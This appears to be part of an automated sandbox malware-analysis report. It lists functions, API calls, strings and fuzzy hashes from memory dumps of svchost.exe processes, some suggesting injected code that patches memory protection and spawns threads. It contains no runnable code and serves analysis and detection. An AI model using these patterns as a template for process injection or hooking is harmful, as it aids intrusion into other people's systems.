VirtualProtectEx.KERNEL32 ref: 0000025304FB383A
TerminateThread.KERNEL32 ref: 0000025304FB3849

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: f1e3e1805cca17ab3c5fa360e36fcb8d6c5d86005c73efd2be66d3f03da98cd5
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: 07111776611F4086EB24DB21ED0D75A66A0BB49BE7F049429CE49077E4EF3DC708C768

Function 0000025304FB90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025304FB9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025304FB9198
RtlUnwindEx.NTDLL ref: 0000025304FB91E7

Strings

f, xrefs: 0000025304FB9116
csm, xrefs: 0000025304FB917E

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: dc1323f8a371ea885bfc1b6e8b070370cd12f57438e79da8c8b3fc12404828d9
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 6A51AC72A11B008AEB18CB15EC4CF583795F346BEAF50A120DB16477C8EBB5CB41C7A8

Function 0000025304FB90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025304FB9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025304FB9198
RtlUnwindEx.NTDLL ref: 0000025304FB91E7

Strings

f, xrefs: 0000025304FB9116
csm, xrefs: 0000025304FB917E

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 29dccc7489ba2c133c631e9e5c062e93cb9b466311e8d1f25909deb730f4a6e3
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: E231BA72200B4096E714DF22EC4CB193BA5F346BEAF15D514AE5A037C9CB78CB41C7A8

Function 0000025304FB1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000025304FB1AD8
StrCmpNIW.SHLWAPI ref: 0000025304FB1AF2
lstrlenW.KERNEL32 ref: 0000025304FB1B01
StrCpyW.SHLWAPI ref: 0000025304FB1B16

Strings

\\?\, xrefs: 0000025304FB1AE6

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: d28ad028590f7058dc277c93f962f9fb4e4a598b35e8bf33c852813925367010
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: B2F04F72304B4192EB60DB61FE993996760F744BEAF88E020CE4946994DE3CC788CB58

Function 0000025304FB3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000025304FB3222
StrCpyW.SHLWAPI ref: 0000025304FB3232
StrCatW.SHLWAPI ref: 0000025304FB323E
PathCombineW.SHLWAPI ref: 0000025304FB324C

Strings

\\.\pipe\, xrefs: 0000025304FB3218

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: 5da940802144578b45a251a6d117f91e8815bce262305d92a978d628b4cfe626
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 86F0A720704F8091EE04CB13BE4D159A220FB48FE2F08E131DE5A07BA8CE3CC7418318

Function 0000025304FBA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000025304FBA154
GetProcAddress.KERNEL32 ref: 0000025304FBA16A
FreeLibrary.KERNEL32 ref: 0000025304FBA187

Strings

mscoree.dll, xrefs: 0000025304FBA14B
CorExitProcess, xrefs: 0000025304FBA163

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 156e89ea958fa978a0021a7824ae5fa1eb0e9f307b5443539d2f12bc2c0c7183
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: 27F08262711F4091EF84CB60FD9C3642360EB48BE2F04B419990B456E5CF38C788CB28

Function 0000025304FB51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025304FB5236

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: 3b7c3188c13dce8f3069841534293cf79643936ba1d6dcb7eb5ee116b1e977cb
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: 9C021932219B8086EB60CB55E89435EB7A1F3C57E5F106015EA8E87BA8DF7CC684CF54

Function 0000025304FC0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000025304FC08A2
GetConsoleMode.KERNEL32 ref: 0000025304FC0960
GetLastError.KERNEL32 ref: 0000025304FC09EA

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: cfd9d903ffadf2afe2b78b2d9fce3c6cd300b1d51d735b1b390dd1a09605796b
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: 9B819C22610F10CDFB50EBA5DE483AD26A0F745BEAF44A116DE0A53AD2DE348747C739

Function 0000025304FB57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000025304FB5806

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: 5c0d319de4b41508922d42687b587cf25951b4c5ba02f31c4a732a7390086c1f
Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction Fuzzy Hash: D761D736519B40D6E760DB15E88831AB7A0F3C9BA9F106125EA8D43BE8CB7CC741CF59

Function 0000025304FC1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000025304FC1EE0
_set_statfp.LIBCMT ref: 0000025304FC1EFB
_set_statfp.LIBCMT ref: 0000025304FC1F17
_set_statfp.LIBCMT ref: 0000025304FC1F53

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: a6c0b64116f2ef89320645c36914f6097c47f0ed12c20e4878e3ccb8977ddbbc
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 5B11E922E54F0041F798D164EF9E3651040BBA63F6F05E664BA76063D78B748F61D93C

Function 0000025304F912B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000025304F912E0
_set_statfp.LIBCMT ref: 0000025304F912FB
_set_statfp.LIBCMT ref: 0000025304F91317
_set_statfp.LIBCMT ref: 0000025304F91353

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 198b6cbbaf1078db734d95a1d187a68f7134e07c2f4a0f37309d103bf5bf6eb0
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: E1114022644F0301FB549165EF5D76932606B543F6F482734EAF746BE68A34CF42413D

Function 0000025304FB3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000025304FB3886
GetCurrentProcess.KERNEL32 ref: 0000025304FB38B4
VirtualProtectEx.KERNEL32 ref: 0000025304FB38D6
GetCurrentProcess.KERNEL32 ref: 0000025304FB38F4
VirtualProtectEx.KERNEL32 ref: 0000025304FB3915

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 88823a78059470b5ad7926548310e3d41740f28cbf7f6594bc03e59556c6745e
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: C0113C3A744F4086FB54DB11F80826966A1F789BE5F049029DE8907B94EF3DC704C758

Function 0000025304F884F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025304F88503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025304F88598

Strings

csm, xrefs: 0000025304F8857E
f, xrefs: 0000025304F88516

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 84c274a7ac89c5fbb67926a31e47b2fcf95c1c2609dbb4769fd76b8b94fd6b1c
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: F6518E32612B008BEB14EF15EC48B593795F744BFAF91A528DA064B7C8EB34DF518728

Function 0000025304F884D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000025304F88503
_IsNonwritableInCurrentImage.LIBCMT ref: 0000025304F88598

Strings

csm, xrefs: 0000025304F8857E
f, xrefs: 0000025304F88516

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: 859561567f322decfba4e951b1c9912cdbf8dfb580fc71819216983a80865003
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 40316872211B4097E714EF11EC48B1937A4F740BEAF95A518AE5A0B784CB38CB61C729

Function 0000025304FB14B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025304FB14D5
HeapFree.KERNEL32 ref: 0000025304FB14E4
GetProcessHeap.KERNEL32 ref: 0000025304FB14F0
HeapFree.KERNEL32 ref: 0000025304FB14FF
GetProcessHeap.KERNEL32 ref: 0000025304FB152A

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: 992deb86ba04eb4c42088d36e1cb011303db7c67522ea1b6f23e777eda326c38
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: E5114C31A14F98DAEB54DF66A94825A7370F78ABD1F049029DF8A03794DF38C251C758

Function 0000025304FB26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025304FB27D4
StrCpyW.SHLWAPI ref: 0000025304FB27ED

Strings

\\.\pipe\, xrefs: 0000025304FB27DF

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction ID: 8e5e549fbe60b4a26aa7e07bdd4787ccf6247e5b05dd1d8bed4f17f408d17450
Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
Instruction Fuzzy Hash: 3071D332200F8185EB24DF25AD5C3EA6794F786BE6F456016DD8947BC8DE35C704C794

Function 0000025304FB24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000025304FB25C3
StrCpyW.SHLWAPI ref: 0000025304FB25DA

Strings

\\.\pipe\, xrefs: 0000025304FB25CE

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 8a19f639f826e8ed3cb024e327ff3d6268ad1f2c2b2029dfeab7991282de7c96
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: CE510C32204F8142E634DE299D5C3AE6652F3877E1F026065CD8A43FD9CE39C7018BE8

Function 0000025304FC0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000025304FC071B
GetLastError.KERNEL32 ref: 0000025304FC073D

Strings

U, xrefs: 0000025304FC06C7

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: b6ae02ee91339585ee91c669ba0d75d4ba2da8bb78dceee93f3a99faf05a04dc
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6C41A072614F8085EB20DF65E9483AAB7A0F7887E5F419025EE4D87798DF38C642CB54

Function 0000025304FBD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025304FBD6F9
LCMapStringW.KERNEL32 ref: 0000025304FBD781

Strings

LCMapStringEx, xrefs: 0000025304FBD6DC, 0000025304FBD6ED

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 73455e267512f8ce58ba33fe9f0236e7d0a70026506fa2b3217eddc7dcb4b48a
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: CD114A36608BC086D760CB16F84429AB7A1F7C9BE0F549126EE8D83B99DF38C640CB44

Function 0000025304FB94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000025304FB94E8
RaiseException.KERNEL32 ref: 0000025304FB952E

Strings

csm, xrefs: 0000025304FB951B

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: 2239c350e170cedadb2b3450c76999124c3cb75d1e7e07f87273f6fbe5723600
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 81114F32204F8082EB61CF15E94465977E4F789BE9F189220DF8D077A4DF78C651CB44

Function 0000025304FBD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025304FBD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000025304FBD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000025304FBD681

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 238ca74183596822a82de3661d6a50f78822c328c070e3d827985df9fe0efc09
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 5CF08225710F8091EB09EB41FD486956322EB88BE2F58E025AD5903B94CE38CB95C768

Function 0000025304FBD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025304FBD631
TlsSetValue.KERNEL32 ref: 0000025304FBD648

Strings

FlsSetValue, xrefs: 0000025304FBD61E

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 78f647240c4775a9c640fa88ff1a0d7804cd4d462ba6e236699d67d8e078e451
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: F7E06D61200F40A1EA08DB50FD086956322AB887E2F58E022D909063D5CE38CB99CB79

Function 0000025304F8CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000025304F8CBC5

Strings

November, xrefs: 0000025304F8CBA8, 0000025304F8CBB2
October, xrefs: 0000025304F8CBBE

Memory Dump Source

Source File: 0000000C.00000002.2636784109.0000025304F80000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304F80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304f80000_svchost.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 52ba9ca23a8df96962fd09b36a0c13f1d65c6f1ce3b9b25d624a97e7ea60cfc9
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: F2E09221204F8193EB05DB52FC4C2E43221EB947E6F5A702696190A2D2CE38CFD78378

Function 0000025304FB1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025304FB1D9B
HeapAlloc.KERNEL32 ref: 0000025304FB1DAA
GetProcessHeap.KERNEL32 ref: 0000025304FB1E1E
HeapFree.KERNEL32 ref: 0000025304FB1E2C

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: c84b4d11aa1048d09faf7564bf290920bfda1e11df7055f33e959c56517ae6d1
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 1521A132604F9086EB11CF5AA90829AB3A0FB89BE5F059110DE8C47BA4EF38D746C754

Function 0000025304FB1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000025304FB127A
HeapAlloc.KERNEL32 ref: 0000025304FB1289
GetProcessHeap.KERNEL32 ref: 0000025304FB12A3
HeapAlloc.KERNEL32 ref: 0000025304FB12B4

Memory Dump Source

Source File: 0000000C.00000002.2637981431.0000025304FB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025304FB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_25304fb0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 31d046753ef1f573ed55d3259e55d586ac2698879a40b7dbdb248a4b8ad203b8
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: B6E06D71A11B008AE704CF62DC0834936F1FB89FA2F48D024CD0907390DF7D8699C760

Analysis Process: svchost.exePID: 476, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	80
Total number of Limit Nodes:	8

Executed Functions

Function 0000016C21161274 Relevance: 5.0, APIs: 4, Instructions: 21
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000016C2116127A
HeapAlloc.KERNEL32 ref: 0000016C21161289
GetProcessHeap.KERNEL32 ref: 0000016C211612A3
HeapAlloc.KERNEL32 ref: 0000016C211612B4

Memory Dump Source

Source File: 0000000D.00000002.2634129266.0000016C21160000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016C21160000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_16c21160000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 1c95bedcf900a1a35f12d56bbcb145ef63a0264c0f41dfed7472d73d16dbca47
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: ADE03975661600C6E7048B62EC243AA37E1EB98B02F488028CE8907750DF7EC4DAC780

Function 0000016C21163458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000016C2116347A
PathFindFileNameW.SHLWAPI ref: 0000016C21163489

Part of subcall function 0000016C21163930: StrCmpNIW.SHLWAPI ref: 0000016C21163948

Part of subcall function 0000016C21163878: GetModuleHandleW.KERNEL32 ref: 0000016C21163886
Part of subcall function 0000016C21163878: GetCurrentProcess.KERNEL32 ref: 0000016C211638B4
Part of subcall function 0000016C21163878: VirtualProtectEx.KERNEL32 ref: 0000016C211638D6
Part of subcall function 0000016C21163878: GetCurrentProcess.KERNEL32 ref: 0000016C211638F4
Part of subcall function 0000016C21163878: VirtualProtectEx.KERNEL32 ref: 0000016C21163915

CreateThread.KERNEL32 ref: 0000016C211634D7

